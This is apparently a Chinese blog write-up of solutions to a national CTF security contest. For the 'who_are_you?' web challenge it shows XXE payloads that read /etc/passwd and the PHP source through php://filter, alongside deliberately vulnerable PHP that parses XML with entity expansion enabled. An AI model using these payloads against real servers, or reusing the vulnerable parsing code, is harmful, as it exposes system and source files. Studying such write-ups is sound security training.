比赛相关信息

赛事全名:第四届中国创新挑战赛暨中关村第三届新兴领域专题赛网络与信息安全专项赛

赛事级别:全国赛

主办单位:国家科技部(指导)、科技部火炬中心、中关村管委会、国家国防科技工业局信息中心

技术支撑:北京永信至诚科技股份有限公司

赛事官网: http://www.net-inf-sec.cn/contest.html

题目仓库:Github

WEB

Game

mark

直接摇摇乐\~一摇就摇出来了\~

who_are_you?

发现原题:https://xz.aliyun.com/t/4616

关键代码:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY doc SYSTEM 'file:///etc/passwd'> ]>
<feedback>
<author>&doc;</author>
<email>we don't care</email>
<content>undefined</content>
</feedback>
<?php
    libxml_disable_entity_loader(false);
    $data = @file_get_contents('php://input');
    $resp = '';
    //$flag='flag{e6970538-d09d-4d2f-98d9-bcc79dd15133}';
    if($data != false){
        $dom = new DOMDocument();
        $dom->loadXML($data, LIBXML_NOENT);
        ob_start();
        $res  = $dom->textContent;
        $resp = ob_get_contents();
        ob_end_clean();
        if ($res){
            die($res);
        }
    }
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>welcome</title>
    <link rel="stylesheet" href="./style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

</head>
<body class="contactBody">
<div class="wrapper">
    <div class="title">


    </div>


    <form method="post" class="form">
        <h1 id="title">请输入姓名</h1>
        <br/>
        <br/>
        <br/>
        <input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
    </form>
    <button class="submit entry" onclick="func()">Submit</button>

    <div class="shadow"></div>
</div>

</body>
</html>
<script type="text/javascript">
    function play() {
        return false;
    }
    function func() {
        // document.getElementById().value
        var xml = '' +
            '<\?xml version="1.0" encoding="UTF-8"\?>' +
            '<feedback>' +
            '<author>' + document.getElementById('name').value+ '</author>' +
            '</feedback>';
        console.log(xml);
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState == 4) {
                // console.log(xmlhttp.readyState);
                // console.log(xmlhttp.responseText);
                var res = xmlhttp.responseText;
                document.getElementById('title').textContent = res
            }
        };
        xmlhttp.open("POST", "index.php", true);
        xmlhttp.send(xml);
        return false;
    };
</script>
</body>
</html>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY doc SYSTEM 'php://filter/convert.base64-encode/resource=index.php'> ]>
<feedback>
<author>&doc;</author>
<email>we don't care</email>
<content>undefined</content>
</feedback>

mark

MISC

签到题

DNS解析记录查询即可~

mark

24word

首先对给出的图片进行OCR文字提取

mark

社会主义核心价值观解密(https://z.duoluosb.com/)

mark

Binwalk扫描图片可以发现藏有压缩包,密码为CodeValues

mark

提取压缩包后可拿到

mark

ps放大图片 微信扫描该图片得到flag

分类: CTF

1 条评论

大白哥哥 · 2019年12月10日 下午2:34

tql

发表评论

电子邮件地址不会被公开。 必填项已用*标注